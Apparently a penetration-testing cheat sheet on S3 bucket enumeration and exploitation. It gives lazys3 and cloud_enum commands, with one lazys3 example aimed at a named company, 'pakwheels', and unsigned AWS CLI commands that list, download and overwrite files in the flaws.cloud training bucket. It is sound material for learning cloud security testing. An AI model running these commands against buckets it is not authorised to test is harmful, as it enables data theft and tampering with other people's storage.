S3 Bucket Enumeration
Lazys3 - Ruby Script
ruby lazys3.rb <company>ruby lazys3.rb pakwheels
Cloud_enum
sudo apt install cloud-enumcloud_enum -k [flaws.cloud](<http://flaws.cloud>) --disable-azure --disable-gcp
S3BucketList - Browser Extension
Manual Installation
Exploiting S3 UnAuthenticated
sudo apt-get install awsclicloud_enum -k [flaws.cloud](<http://flaws.cloud>) --disable-azure --disable-gcpaws s3 ls s3://flaws.cloud/ --no-sign-requestDownload -
aws s3 cp s3://flaws.cloud/secret.html ./ --no-sign-requestUpload -
aws s3 cp ./index.html s3://flaws.cloud/secret.html --no-sign-request
Exploiting S3 Authenticated
Create a free AWS account
Go to AWS IAM dashboard
Users → Add New user with programmatic access credential type
Once user is created, note down the
access keyandsecret access keyClick User → Permissions → Add permissions → Attach existing policies →
AmazonS3FullAccessaws configure --profile someoneaws s3 --profile someone ls s3://flaws.cloud/ --no-sign-requestaws s3 --profile someone cp s3://flaws.cloud/something.html ./
Last updated
Was this helpful?